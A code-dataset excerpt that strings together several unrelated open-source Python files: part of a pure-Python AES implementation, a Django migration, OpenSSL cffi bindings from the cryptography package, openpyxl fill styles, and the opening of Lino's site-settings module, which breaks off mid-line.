0xe1,0xf8,0x98,0x11,0x69,0xd9,0x8e,0x94, 0x9b,0x1e,0x87,0xe9,0xce,0x55,0x28,0xdf, 0x8c,0xa1,0x89,0x0d,0xbf,0xe6,0x42,0x68, 0x41,0x99,0x2d,0x0f,0xb0,0x54,0xbb,0x16) InvSbox = (0x52,0x09,0x6a,0xd5,0x30,0x36,0xa5,0x38, 0xbf,0x40,0xa3,0x9e,0x81,0xf3,0xd7,0xfb, 0x7c,0xe3,0x39,0x82,0x9b,0x2f,0xff,0x87, 0x34,0x8e,0x43,0x44,0xc4,0xde,0xe9,0xcb, 0x54,0x7b,0x94,0x32,0xa6,0xc2,0x23,0x3d, 0xee,0x4c,0x95,0x0b,0x42,0xfa,0xc3,0x4e, 0x08,0x2e,0xa1,0x66,0x28,0xd9,0x24,0xb2, 0x76,0x5b,0xa2,0x49,0x6d,0x8b,0xd1,0x25, 0x72,0xf8,0xf6,0x64,0x86,0x68,0x98,0x16, 0xd4,0xa4,0x5c,0xcc,0x5d,0x65,0xb6,0x92, 0x6c,0x70,0x48,0x50,0xfd,0xed,0xb9,0xda, 0x5e,0x15,0x46,0x57,0xa7,0x8d,0x9d,0x84, 0x90,0xd8,0xab,0x00,0x8c,0xbc,0xd3,0x0a, 0xf7,0xe4,0x58,0x05,0xb8,0xb3,0x45,0x06, 0xd0,0x2c,0x1e,0x8f,0xca,0x3f,0x0f,0x02, 0xc1,0xaf,0xbd,0x03,0x01,0x13,0x8a,0x6b, 0x3a,0x91,0x11,0x41,0x4f,0x67,0xdc,0xea, 0x97,0xf2,0xcf,0xce,0xf0,0xb4,0xe6,0x73, 0x96,0xac,0x74,0x22,0xe7,0xad,0x35,0x85, 0xe2,0xf9,0x37,0xe8,0x1c,0x75,0xdf,0x6e, 0x47,0xf1,0x1a,0x71,0x1d,0x29,0xc5,0x89, 0x6f,0xb7,0x62,0x0e,0xaa,0x18,0xbe,0x1b, 0xfc,0x56,0x3e,0x4b,0xc6,0xd2,0x79,0x20, 0x9a,0xdb,0xc0,0xfe,0x78,0xcd,0x5a,0xf4, 0x1f,0xdd,0xa8,0x33,0x88,0x07,0xc7,0x31, 0xb1,0x12,0x10,0x59,0x27,0x80,0xec,0x5f, 0x60,0x51,0x7f,0xa9,0x19,0xb5,0x4a,0x0d, 0x2d,0xe5,0x7a,0x9f,0x93,0xc9,0x9c,0xef, 0xa0,0xe0,0x3b,0x4d,0xae,0x2a,0xf5,0xb0, 0xc8,0xeb,0xbb,0x3c,0x83,0x53,0x99,0x61, 0x17,0x2b,0x04,0x7e,0xba,0x77,0xd6,0x26, 0xe1,0x69,0x14,0x63,0x55,0x21,0x0c,0x7d) #------------------------------------- """ For each block size (Nb), the ShiftRow operation shifts row i by the amount Ci. Note that row 0 is not shifted. Nb C1 C2 C3 ------------------- """ shiftOffset = { 4 : ( 0, 1, 2, 3), 5 : ( 0, 1, 2, 3), 6 : ( 0, 1, 2, 3), 7 : ( 0, 1, 2, 4), 8 : ( 0, 1, 3, 4) } def ShiftRows(algInstance): tmp = [0]*algInstance.Nb # list of size Nb for r in range(1,4): # row 0 reamains unchanged and can be skipped for c in range(algInstance.Nb): tmp[c] = algInstance.state[(c+shiftOffset[algInstance.Nb][r]) % algInstance.Nb][r] for c in range(algInstance.Nb): algInstance.state[c][r] = tmp[c] def InvShiftRows(algInstance): tmp = [0]*algInstance.Nb # list of size Nb for r in range(1,4): # row 0 reamains unchanged and can be skipped for c in range(algInstance.Nb): tmp[c] = algInstance.state[(c+algInstance.Nb-shiftOffset[algInstance.Nb][r]) % algInstance.Nb][r] for c in range(algInstance.Nb): algInstance.state[c][r] = tmp[c] #------------------------------------- def MixColumns(a): Sprime = [0,0,0,0] for j in range(a.Nb): # for each column Sprime[0] = mul(2,a.state[j][0])^mul(3,a.state[j][1])^mul(1,a.state[j][2])^mul(1,a.state[j][3]) Sprime[1] = mul(1,a.state[j][0])^mul(2,a.state[j][1])^mul(3,a.state[j][2])^mul(1,a.state[j][3]) Sprime[2] = mul(1,a.state[j][0])^mul(1,a.state[j][1])^mul(2,a.state[j][2])^mul(3,a.state[j][3]) Sprime[3] = mul(3,a.state[j][0])^mul(1,a.state[j][1])^mul(1,a.state[j][2])^mul(2,a.state[j][3]) for i in range(4): a.state[j][i] = Sprime[i] def InvMixColumns(a): """ Mix the four bytes of every column in a linear way This is the opposite operation of Mixcolumn """ Sprime = [0,0,0,0] for j in range(a.Nb): # for each column Sprime[0] = mul(0x0E,a.state[j][0])^mul(0x0B,a.state[j][1])^mul(0x0D,a.state[j][2])^mul(0x09,a.state[j][3]) Sprime[1] = mul(0x09,a.state[j][0])^mul(0x0E,a.state[j][1])^mul(0x0B,a.state[j][2])^mul(0x0D,a.state[j][3]) Sprime[2] = mul(0x0D,a.state[j][0])^mul(0x09,a.state[j][1])^mul(0x0E,a.state[j][2])^mul(0x0B,a.state[j][3]) Sprime[3] = mul(0x0B,a.state[j][0])^mul(0x0D,a.state[j][1])^mul(0x09,a.state[j][2])^mul(0x0E,a.state[j][3]) for i in range(4): a.state[j][i] = Sprime[i] #------------------------------------- def mul(a, b): """ Multiply two elements of GF(2^m) needed for MixColumn and InvMixColumn """ if (a !=0 and b!=0): return Alogtable[(Logtable[a] + Logtable[b])%255] else: return 0 Logtable = ( 0, 0, 25, 1, 50, 2, 26, 198, 75, 199, 27, 104, 51, 238, 223, 3, 100, 4, 224, 14, 52, 141, 129, 239, 76, 113, 8, 200, 248, 105, 28, 193, 125, 194, 29, 181, 249, 185, 39, 106, 77, 228, 166, 114, 154, 201, 9, 120, 101, 47, 138, 5, 33, 15, 225, 36, 18, 240, 130, 69, 53, 147, 218, 142, 150, 143, 219, 189, 54, 208, 206, 148, 19, 92, 210, 241, 64, 70, 131, 56, 102, 221, 253, 48, 191, 6, 139, 98, 179, 37, 226, 152, 34, 136, 145, 16, 126, 110, 72, 195, 163, 182, 30, 66, 58, 107, 40, 84, 250, 133, 61, 186, 43, 121, 10, 21, 155, 159, 94, 202, 78, 212, 172, 229, 243, 115, 167, 87, 175, 88, 168, 80, 244, 234, 214, 116, 79, 174, 233, 213, 231, 230, 173, 232, 44, 215, 117, 122, 235, 22, 11, 245, 89, 203, 95, 176, 156, 169, 81, 160, 127, 12, 246, 111, 23, 196, 73, 236, 216, 67, 31, 45, 164, 118, 123, 183, 204, 187, 62, 90, 251, 96, 177, 134, 59, 82, 161, 108, 170, 85, 41, 157, 151, 178, 135, 144, 97, 190, 220, 252, 188, 149, 207, 205, 55, 63, 91, 209, 83, 57, 132, 60, 65, 162, 109, 71, 20, 42, 158, 93, 86, 242, 211, 171, 68, 17, 146, 217, 35, 32, 46, 137, 180, 124, 184, 38, 119, 153, 227, 165, 103, 74, 237, 222, 197, 49, 254, 24, 13, 99, 140, 128, 192, 247, 112, 7) Alogtable= ( 1, 3, 5, 15, 17, 51, 85, 255, 26, 46, 114, 150, 161, 248, 19, 53, 95, 225, 56, 72, 216, 115, 149, 164, 247, 2, 6, 10, 30, 34, 102, 170, 229, 52, 92, 228, 55, 89, 235, 38, 106, 190, 217, 112, 144, 171, 230, 49, 83, 245, 4, 12, 20, 60, 68, 204, 79, 209, 104, 184, 211, 110, 178, 205, 76, 212, 103, 169, 224, 59, 77, 215, 98, 166, 241, 8, 24, 40, 120, 136, 131, 158, 185, 208, 107, 189, 220, 127, 129, 152, 179, 206, 73, 219, 118, 154, 181, 196, 87, 249, 16, 48, 80, 240, 11, 29, 39, 105, 187, 214, 97, 163, 254, 25, 43, 125, 135, 146, 173, 236, 47, 113, 147, 174, 233, 32, 96, 160, 251, 22, 58, 78, 210, 109, 183, 194, 93, 231, 50, 86, 250, 21, 63, 65, 195, 94, 226, 61, 71, 201, 64, 192, 91, 237, 44, 116, 156, 191, 218, 117, 159, 186, 213, 100, 172, 239, 42, 126, 130, 157, 188, 223, 122, 142, 137, 128, 155, 182, 193, 88, 232, 35, 101, 175, 234, 37, 111, 177, 200, 67, 197, 84, 252, 31, 33, 99, 165, 244, 7, 9, 27, 45, 119, 153, 176, 203, 70, 202, 69, 207, 74, 222, 121, 139, 134, 145, 168, 227, 62, 66, 198, 81, 243, 14, 18, 54, 90, 238, 41, 123, 141, 140, 143, 138, 133, 148, 167, 242, 13, 23, 57, 75, 221, 124, 132, 151, 162, 253, 28, 36, 108, 180, 199, 82, 246, 1)
mit
4,782,612,339,069,262,000
49.927336
115
0.547901
false
Ninad998/FinalYearProject
deep_stylo/migrations/0001_initial.py
1
1563
# -*- coding: utf-8 -*- # Generated by Django 1.10.6 on 2017-03-24 16:30 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models import django.db.models.deletion import django.utils.timezone class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Result', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('doc_id', models.IntegerField()), ('authorList', models.CharField(max_length=200)), ('predicted_author', models.CharField(max_length=200, null=True)), ('train_accuracy', models.DecimalField(decimal_places=10, max_digits=11, null=True)), ('validation_accuracy', models.DecimalField(decimal_places=10, max_digits=11, null=True)), ('test_accuracy', models.DecimalField(decimal_places=10, max_digits=11, null=True)), ('test_binary', models.DecimalField(decimal_places=1, max_digits=2, null=True)), ('upload_date', models.DateTimeField(default=django.utils.timezone.now)), ('status', models.DecimalField(decimal_places=1, default=0.0, max_digits=2)), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), ]
mit
-7,605,435,888,718,739,000
42.416667
118
0.627639
false
Ayrx/cryptography
src/_cffi_src/openssl/crypto.py
1
3371
# This file is dual licensed under the terms of the Apache License, Version # 2.0, and the BSD License. See the LICENSE file in the root of this repository # for complete details. from __future__ import absolute_import, division, print_function INCLUDES = """ #include <openssl/crypto.h> """ TYPES = """ static const long Cryptography_HAS_LOCKING_CALLBACKS; static const int SSLEAY_VERSION; static const int SSLEAY_CFLAGS; static const int SSLEAY_PLATFORM; static const int SSLEAY_DIR; static const int SSLEAY_BUILT_ON; static const int OPENSSL_VERSION; static const int OPENSSL_CFLAGS; static const int OPENSSL_BUILT_ON; static const int OPENSSL_PLATFORM; static const int OPENSSL_DIR; static const int CRYPTO_MEM_CHECK_ON; static const int CRYPTO_MEM_CHECK_OFF; static const int CRYPTO_MEM_CHECK_ENABLE; static const int CRYPTO_MEM_CHECK_DISABLE; static const int CRYPTO_LOCK; static const int CRYPTO_UNLOCK; static const int CRYPTO_READ; static const int CRYPTO_LOCK_SSL; """ FUNCTIONS = """ int CRYPTO_mem_ctrl(int); int CRYPTO_is_mem_check_on(void); void CRYPTO_mem_leaks(struct bio_st *); """ MACROS = """ /* CRYPTO_cleanup_all_ex_data became a macro in 1.1.0 */ void CRYPTO_cleanup_all_ex_data(void); /* as of 1.1.0 OpenSSL does its own locking *angelic chorus*. These functions have become macros that are no ops */ int CRYPTO_num_locks(void); void CRYPTO_set_locking_callback(void(*)(int, int, const char *, int)); void (*CRYPTO_get_locking_callback(void))(int, int, const char *, int); /* SSLeay was removed in 1.1.0 */ unsigned long SSLeay(void); const char *SSLeay_version(int); /* these functions were added to replace the SSLeay functions in 1.1.0 */ unsigned long OpenSSL_version_num(void); const char *OpenSSL_version(int); /* this is a macro in 1.1.0 */ void OPENSSL_free(void *); /* This was removed in 1.1.0 */ void CRYPTO_lock(int, int, const char *, int); """ CUSTOMIZATIONS = """ /* In 1.1.0 SSLeay has finally been retired. We bidirectionally define the values so you can use either one. This is so we can use the new function names no matter what OpenSSL we're running on, but users on older pyOpenSSL releases won't see issues if they're running OpenSSL 1.1.0 */ #if !defined(SSLEAY_VERSION) # define SSLeay OpenSSL_version_num # define SSLeay_version OpenSSL_version # define SSLEAY_VERSION_NUMBER OPENSSL_VERSION_NUMBER # define SSLEAY_VERSION OPENSSL_VERSION # define SSLEAY_CFLAGS OPENSSL_CFLAGS # define SSLEAY_BUILT_ON OPENSSL_BUILT_ON # define SSLEAY_PLATFORM OPENSSL_PLATFORM # define SSLEAY_DIR OPENSSL_DIR #endif #if !defined(OPENSSL_VERSION) # define OpenSSL_version_num SSLeay # define OpenSSL_version SSLeay_version # define OPENSSL_VERSION SSLEAY_VERSION # define OPENSSL_CFLAGS SSLEAY_CFLAGS # define OPENSSL_BUILT_ON SSLEAY_BUILT_ON # define OPENSSL_PLATFORM SSLEAY_PLATFORM # define OPENSSL_DIR SSLEAY_DIR #endif #if !defined(CRYPTO_LOCK) static const long Cryptography_HAS_LOCKING_CALLBACKS = 0; static const long CRYPTO_LOCK = 0; static const long CRYPTO_UNLOCK = 0; static const long CRYPTO_READ = 0; static const long CRYPTO_LOCK_SSL = 0; void (*CRYPTO_lock)(int, int, const char *, int) = NULL; #else static const long Cryptography_HAS_LOCKING_CALLBACKS = 1; #endif """
bsd-3-clause
7,430,546,441,362,209,000
33.397959
79
0.723821
false
mfsteen/CIQTranslate-Kristian
openpyxl/styles/fills.py
1
5258
from __future__ import absolute_import # Copyright (c) 2010-2016 openpyxl from openpyxl.descriptors import Float, Set, Alias, NoneSet from openpyxl.descriptors.sequence import ValueSequence from openpyxl.compat import safe_string from .colors import ColorDescriptor, Color from .hashable import HashableObject from openpyxl.xml.functions import Element, localname, safe_iterator from openpyxl.xml.constants import SHEET_MAIN_NS FILL_NONE = 'none' FILL_SOLID = 'solid' FILL_PATTERN_DARKDOWN = 'darkDown' FILL_PATTERN_DARKGRAY = 'darkGray' FILL_PATTERN_DARKGRID = 'darkGrid' FILL_PATTERN_DARKHORIZONTAL = 'darkHorizontal' FILL_PATTERN_DARKTRELLIS = 'darkTrellis' FILL_PATTERN_DARKUP = 'darkUp' FILL_PATTERN_DARKVERTICAL = 'darkVertical' FILL_PATTERN_GRAY0625 = 'gray0625' FILL_PATTERN_GRAY125 = 'gray125' FILL_PATTERN_LIGHTDOWN = 'lightDown' FILL_PATTERN_LIGHTGRAY = 'lightGray' FILL_PATTERN_LIGHTGRID = 'lightGrid' FILL_PATTERN_LIGHTHORIZONTAL = 'lightHorizontal' FILL_PATTERN_LIGHTTRELLIS = 'lightTrellis' FILL_PATTERN_LIGHTUP = 'lightUp' FILL_PATTERN_LIGHTVERTICAL = 'lightVertical' FILL_PATTERN_MEDIUMGRAY = 'mediumGray' fills = (FILL_SOLID, FILL_PATTERN_DARKDOWN, FILL_PATTERN_DARKGRAY, FILL_PATTERN_DARKGRID, FILL_PATTERN_DARKHORIZONTAL, FILL_PATTERN_DARKTRELLIS, FILL_PATTERN_DARKUP, FILL_PATTERN_DARKVERTICAL, FILL_PATTERN_GRAY0625, FILL_PATTERN_GRAY125, FILL_PATTERN_LIGHTDOWN, FILL_PATTERN_LIGHTGRAY, FILL_PATTERN_LIGHTGRID, FILL_PATTERN_LIGHTHORIZONTAL, FILL_PATTERN_LIGHTTRELLIS, FILL_PATTERN_LIGHTUP, FILL_PATTERN_LIGHTVERTICAL, FILL_PATTERN_MEDIUMGRAY) class Fill(HashableObject): """Base class""" tagname = "fill" @classmethod def from_tree(cls, el): children = [c for c in el] if not children: return child = children[0] if "patternFill" in child.tag: return PatternFill._from_tree(child) else: return GradientFill._from_tree(child) class PatternFill(Fill): """Area fill patterns for use in styles. Caution: if you do not specify a fill_type, other attributes will have no effect !""" tagname = "patternFill" __fields__ = ('patternType', 'fgColor', 'bgColor') __elements__ = ('fgColor', 'bgColor') patternType = NoneSet(values=fills) fill_type = Alias("patternType") fgColor = ColorDescriptor() start_color = Alias("fgColor") bgColor = ColorDescriptor() end_color = Alias("bgColor") def __init__(self, patternType=None, fgColor=Color(), bgColor=Color(), fill_type=None, start_color=None, end_color=None): if fill_type is not None: patternType = fill_type self.patternType = patternType if start_color is not None: fgColor = start_color self.fgColor = fgColor if end_color is not None: bgColor = end_color self.bgColor = bgColor @classmethod def _from_tree(cls, el): attrib = dict(el.attrib) for child in el: desc = localname(child) attrib[desc] = Color.from_tree(child) return cls(**attrib) def to_tree(self, tagname=None): parent = Element("fill") el = Element(self.tagname) if self.patternType is not None: el.set('patternType', self.patternType) for c in self.__elements__: value = getattr(self, c) if value != Color(): el.append(value.to_tree(c)) parent.append(el) return parent DEFAULT_EMPTY_FILL = PatternFill() DEFAULT_GRAY_FILL = PatternFill(patternType='gray125') def _serialise_stop(tagname, sequence, namespace=None): for idx, color in enumerate(sequence): stop = Element("stop", position=str(idx)) stop.append(color.to_tree()) yield stop class GradientFill(Fill): tagname = "gradientFill" __fields__ = ('type', 'degree', 'left', 'right', 'top', 'bottom', 'stop') type = Set(values=('linear', 'path')) fill_type = Alias("type") degree = Float() left = Float() right = Float() top = Float() bottom = Float() stop = ValueSequence(expected_type=Color, to_tree=_serialise_stop) def __init__(self, type="linear", degree=0, left=0, right=0, top=0, bottom=0, stop=(), fill_type=None): self.degree = degree self.left = left self.right = right self.top = top self.bottom = bottom self.stop = stop if fill_type is not None: type = fill_type self.type = type def __iter__(self): for attr in self.__attrs__: value = getattr(self, attr) if value: yield attr, safe_string(value) @classmethod def _from_tree(cls, node): colors = [] for color in safe_iterator(node, "{%s}color" % SHEET_MAIN_NS): colors.append(Color.from_tree(color)) return cls(stop=colors, **node.attrib) def to_tree(self, tagname=None, namespace=None): parent = Element("fill") el = super(GradientFill, self).to_tree() parent.append(el) return parent
gpl-3.0
-6,165,026,717,945,432,000
29.218391
86
0.63294
false
MaxTyutyunnikov/lino
lino/lino_site.py
1
69806
# -*- coding: UTF-8 -*- ## Copyright 2002-2013 Luc Saffre ## This file is part of the Lino project. ## Lino is free software; you can redistribute it and/or modify ## it under the terms of the GNU General Public License as published by ## the Free Software Foundation; either version 3 of the License, or ## (at your option) any later version. ## Lino is distributed in the hope that it will be useful, ## but WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ## GNU General Public License for more details. ## You should have received a copy of the GNU General Public License ## along with Lino; if not, see <http://www.gnu.org/licenses/>. """ This defines the :class:`Site` class. It has a lot of class attributes which may be overridden by the application developer and/or the local site administrator. Here is a list of Lino-specific settings. The settings inherited :class:`north.north_site.Site` and :class:`djangosite.Site` are documented there. .. setting:: config_id The primary key of the one and only `SiteConfig` instance of this SITE. Default value is 1. This is Lino's equivalent of Django's :setting:`SITE_ID` setting. Lino applications don't need ``django.contrib.sites`` (`The "sites" framework <https://docs.djangoproject.com/en/dev/ref/contrib/sites/>`_) because this functionality is integral part of :mod:`lino.modlib.system`. .. setting:: use_davlink Set this to `True` if this site should feature WebDAV-enabled links using :ref:`davlink`. .. setting:: use_eidreader No longer used. Replaced by :class:`lino.mixins.beid.BeIdReaderPlugin`. Set this to `True` if this site should feature using :ref:`eidreader`. .. setting:: auto_configure_logger_names A string with a space-separated list of logger names to be automatically configured. See :mod:`lino.utils.log`. .. setting:: user_model Set this to ``"users.User"`` if you use `lino.modlib.users`. Default value us `None`, meaning that this site has no user management (feature used by e.g. :mod:`lino.test_apps.1`) Set this to ``"auth.User"`` if you use `django.contrib.auth` instead of `lino.modlib.users` (not tested). .. setting:: remote_user_header The name of the header (set by the web server) that Lino should consult for finding the user of a request. The default value `None` means that http authentication is not used. Apache's default value is ``"REMOTE_USER"``. .. setting:: ldap_auth_server This should be a string with the domain name and DNS (separated by a space) of the LDAP server to be used for authentication. Example:: ldap_auth_server = 'DOMAIN_NAME SERVER_DNS' .. setting:: auth_middleware Override used Authorisation middlewares with supplied tuple of middleware class names. If None, use logic described in :doc:`/topics/auth` .. setting:: project_model Optionally set this to the <applabel.modelname> of a model used as "central project" in your application. Which concretely means that certain other models like notes.Note, outbox.Mail, ... have an additional foreignkey to this model. Not yet decided whther this makes sense. It is probably an obsolete pattern. .. setting:: admin_prefix The prefix to use for Lino "admin mode" (i.e. the "admin main page" with a pull-down "main menu"). The default value is an empty string, resulting in a website whose root url shows the admin mode. Note that unlike Django's `MEDIA_URL <https://docs.djangoproject.com/en/dev/ref/settings/#media-url>`__ setting, this must not contain any slash. If this is nonempty, then your site features a "web content mode": the root url renders "web content" defined by :mod:`lino.modlib.pages`. The usual value in that case is ``admin_prefix = "admin"``. See also - `telling Django to recognize a different application root url <http://groups.google.com/group/django-users/browse_thread/thread/c95ba83e8f666ae5?pli=1>`__ - `How to get site's root path in Django <http://groups.google.com/group/django-users/browse_thread/thread/27f035aa8e566af6>`__ - `#8906 django.contrib.auth settings.py URL's aren't portable <https://code.djangoproject.com/ticket/8906>`__ - `Changed the way URL paths are determined <https://code.djangoproject.com/wiki/BackwardsIncompatibleChanges#ChangedthewayURLpathsaredetermined>`__ .. setting:: plain_prefix The prefix to use for "plain html" URLs. Default value is ``'plain'``. Exactly one of :setting:`admin_prefix` and :setting:`plain_prefix` must be empty. .. setting:: preview_limit Default value for the :attr:`preview_limit <lino.core.tables.AbstractTable.preview_limit>` parameter of all tables who don't specify their own one. Default value is 15. .. setting:: calendar_start_hour The time at which the CalendarPanel's daily view starts. Used when :setting:`use_extensible` is True. .. setting:: calendar_end_hour The time at which the CalendarPanel's daily view ends. Used when :setting:`use_extensible` is True. .. setting:: start_year An integer with the calendar year in which this site starts working. Used e.g. by :mod:`lino.modlib.ledger.utils` to fill the default list of FixcalYears. Or by :mod:`lino.modlib.ledger.fixtures.mini` to generate demo invoices. .. setting:: setup_choicelists Redefine application-specific Choice Lists. Especially used to define application-specific :class:`UserProfiles <lino.core.perms.UserProfiles>`. Lino by default has two user profiles "User" and "Administrator", defined in :mod:`lino.core.perms`. Application developers who use group-based requirements must override this in their application's :xfile:`settings.py` to provide a default list of user profiles for their application. See the source code of :mod:`lino.projects.presto` or :mod:`lino.projects.pcsw` for a usage example. Local site administrators may again override this in their :xfile:`settings.py`. Note that you may not specify values longer than `max_length` when redefining your choicelists. This limitation is because these redefinitions happen at a moment where database fields have already been instantiated, so it is too late to change their max_length. Not that this limitation is only for the *values*, not for the names or texts of choices. .. setting:: get_installed_apps This method is expected to yield the list of strings to be stored into Django's :setting:`INSTALLED_APPS` setting. """ from __future__ import unicode_literals import logging logger = logging.getLogger(__name__) import os from os.path import join, abspath, dirname, normpath, isdir, exists import sys import cgi import inspect import datetime from decimal import Decimal from urllib import urlencode from pkg_resources import Requirement, resource_filename, DistributionNotFound from lino.utils.xmlgen import html as xghtml from lino.utils import AttrDict #~ from lino import SETUP_INFO from django.utils.translation import ugettext_lazy as _ from north import Site import lino from lino import ad from lino.utils.xmlgen.html import E class Site(Site): """ This is the base for every Lino Site. """ config_id = 1 preview_limit = 15 calendar_start_hour = 8 calendar_end_hour = 18 override_modlib_models = set() "See :attr:`lino.site.Site.override_modlib_models`." textfield_format = 'plain' """ The default format for text fields. Valid choices are currently 'plain' and 'html'. Text fields are either Django's `models.TextField` or :class:`lino.fields.RichTextField`. You'll probably better leave the global option as 'plain', and specify explicitly the fields you want as html by declaring them:: foo = fields.RichTextField(...,format='html') We even recommend that you declare your *plain* text fields also using `fields.RichTextField` and not `models.TextField`:: foo = fields.RichTextField() Because that gives subclasses of your application the possibility to make that specific field html-formatted:: resolve_field('Bar.foo').set_format('html') """ help_url = "http://code.google.com/p/lino" #~ site_url = #~ index_html = "This is the main page." #~ title = None title = "Unnamed Lino site" #~ domain = "www.example.com" catch_layout_exceptions = True """ Lino usually catches any exception during :meth:`lino.ui.extjs3.ExtUI.create_layout_element` to report errors of style "Unknown element "postings.PostingsByController ('postings')" referred in layout <PageDetail on pages.Pages>." Setting this to `False` is useful when there's some problem *within* the framework. """ #~ preferred_build_method = 'pisa' #~ preferred_build_method = 'appypdf' csv_params = dict() """ Site-wide default parameters for CSV generation. This must be a dictionary that will be used as keyword parameters to Python `csv.writer() <http://docs.python.org/library/csv.html#csv.writer>`_ Possible keys include: - encoding : the charset to use when responding to a CSV request. See http://docs.python.org/library/codecs.html#standard-encodings for a list of available values. - many more allowed keys are explained in `Dialects and Formatting Parameters <http://docs.python.org/library/csv.html#csv-fmt-params>`_. """ auto_configure_logger_names = 'djangosite north lino' appy_params = dict(ooPort=8100) """ Used by :class:`lino.mixins.printable.AppyBuildMethod`. """ modules = AttrDict() # this is explained in the polls tutorial # cannot use autodoc for this attribute # because autodoc shows the "default" value #~ decimal_separator = '.' decimal_separator = ',' """ Set this to either ``'.'`` or ``','`` to define wether to use comma or dot as decimal point separator when entering a `DecimalField`. """ #~ decimal_group_separator = ',' decimal_group_separator = ' ' """ Decimal group separator for :func:`lino.utils.moneyfmt`. """ time_format_strftime = '%H:%M' """ Format (in strftime syntax) to use for displaying dates to the user. If you change this setting, you also need to override :meth:`parse_time`. """ date_format_strftime = '%d.%m.%Y' """ Format (in strftime syntax) to use for displaying dates to the user. If you change this setting, you also need to override :meth:`parse_date`. """ #~ date_format_regex = "/^[0123]\d\.[01]\d\.-?\d+$/" date_format_regex = "/^[0123]?\d\.[01]?\d\.-?\d+$/" """ Format (in Javascript regex syntax) to use for displaying dates to the user. If you change this setting, you also need to override :meth:`parse_date`. """ datetime_format_strftime = '%Y-%m-%dT%H:%M:%S' """ Format (in strftime syntax) to use for formatting timestamps in AJAX responses. If you change this setting, you also need to override :meth:`parse_datetime`. """ datetime_format_extjs = 'Y-m-d\TH:i:s' """ Format (in ExtJS syntax) to use for formatting timestamps in AJAX calls. If you change this setting, you also need to override :meth:`parse_datetime`. """ _welcome_actors = [] def init_before_local(self,*args): super(Site,self).init_before_local(*args) self.GFK_LIST = [] self.VIRTUAL_FIELDS = [] self.update_settings( LOGGING_CONFIG='lino.utils.log.configure', LOGGING=dict(filename=None, level='INFO', logger_names=self.auto_configure_logger_names, disable_existing_loggers=True, # Django >= 1.5 ), ) def parse_date(self,s): """ Convert a string formatted using :attr:`date_format_strftime` or :attr:`date_format_extjs` into a `(y,m,d)` tuple (not a `datetime.date` instance). See `/blog/2010/1130`. """ ymd = tuple(reversed(map(int,s.split('.')))) assert len(ymd) == 3 return ymd #~ return datetime.date(*ymd) def parse_time(self,s): """ Convert a string formatted using :attr:`time_format_strftime` or :attr:`time_format_extjs` into a datetime.time instance. """ hms = map(int,s.split(':')) return datetime.time(*hms) def parse_datetime(self,s): """ Convert a string formatted using :attr:`datetime_format_strftime` or :attr:`datetime_format_extjs` into a datetime.datetime instance. """ #~ print "20110701 parse_datetime(%r)" % s #~ s2 = s.split() s2 = s.split('T') if len(s2) != 2: raise Exception("Invalid datetime string %r" % s) ymd = map(int,s2[0].split('-')) hms = map(int,s2[1].split(':')) return datetime.datetime(*(ymd+hms)) #~ d = datetime.date(*self.parse_date(s[0])) #~ return datetime.combine(d,t) ignore_dates_before = datetime.date.today() + datetime.timedelta(days=-7) """ Ignore dates before the gived date. Set this to None if you want no limit. """ #~ def get_user_model(self): #~ if 'django.contrib.auth' in self.django_settings['INSTALLED_APPS']: #~ from django.contrib.auth.models import User #~ return 'auth.User' #~ else: #~ from lino.modlib.users.models import User #~ return User #~ return 'users.User' #~ def add_dummy_message(self,s): #~ self.dummy_messages.add(s) #~ def get_app_source_file(self): #~ "Override this in each application" #~ return __file__ #~ def analyze_models(self): #~ from lino.core.kernel import analyze_models #~ analyze_models() def resolve_virtual_fields(self): #~ print "20130827 resolve_virtual_fields", len(self.VIRTUAL_FIELDS) #~ global VIRTUAL_FIELDS for vf in self.VIRTUAL_FIELDS: vf.lino_resolve_type() #~ VIRTUAL_FIELDS = None self.VIRTUAL_FIELDS = [] def register_virtual_field(self,vf): #~ print "20130827 register_virtual_field", vf self.VIRTUAL_FIELDS.append(vf) def do_site_startup(self): """ Start the Lino instance (the object stored as :setting:`LINO` in your :xfile:`settings.py`). This is called exactly once from :mod:`lino.models` when Django has has populated it's model cache. This code can run several times at once when running e.g. under mod_wsgi: another thread has started and not yet finished `startup_site()`. """ super(Site,self).do_site_startup() from lino.core.kernel import startup_site startup_site(self) from django.conf import settings if self.build_js_cache_on_startup is None: from lino.core.dbutils import is_devserver self.build_js_cache_on_startup = not (settings.DEBUG or is_devserver()) from lino.core.web import site_setup site_setup(self) from lino.ui.ui import ExtUI self.ui = ExtUI(self) from lino.core import actors for a in actors.actors_list: if a.get_welcome_messages is not None: self._welcome_actors.append(a) #~ def shutdown(self): #~ return super(Site,self).shutdown() #~ from lino.core.kernel import shutdown_site #~ shutdown_site(self) #~ def setup_workflows(self): self.on_each_app('setup_workflows') def setup_choicelists(self): from lino.utils import dblogger as logger #~ raise Exception("20130302 setup_choicelists()") #~ logger.info("20130302 setup_choicelists()") from django.utils.translation import ugettext_lazy as _ from lino import dd dd.UserProfiles.reset() add = dd.UserProfiles.add_item add('000', _("Anonymous"), name='anonymous', level=None, #~ readonly=True, authenticated=False) add('100', _("User"), name='user', level='user') add('900', _("Administrator"), name='admin', level='admin') def add_user_field(self,name,fld): if self.user_model: from lino import dd #~ User = dd.resolve_model(self.user_model) dd.inject_field(self.user_model,name,fld) #~ if profile: #~ self.user_profile_fields.append(name) def get_generic_related(self,obj): """ Yield all database objects in database which have a GenericForeignKey that points to the object `obj`. """ from django.contrib.contenttypes.models import ContentType for gfk in self.GFK_LIST: ct = ContentType.objects.get_for_model(gfk.model) kw = dict() kw[gfk.fk_field] = obj.pk yield gfk, ct.get_all_objects_for_this_type(**kw) def using(self,ui=None): """ Adds Lino, Jinja, Spinx, dateutil, ... """ import lino yield ("Lino",lino.SETUP_INFO['version'],lino.SETUP_INFO['url']) for u in super(Site,self).using(ui): yield u #~ import tidylib #~ version = getattr(tidylib,'__version__','') #~ yield ("tidylib",version,"http://countergram.com/open-source/pytidylib") #~ import pyPdf #~ version = getattr(pyPdf,'__version__','') #~ yield ("pyPdf",version,"http://countergram.com/open-source/pytidylib") import jinja2 version = getattr(jinja2,'__version__','') yield ("Jinja",version,"http://jinja.pocoo.org/") import 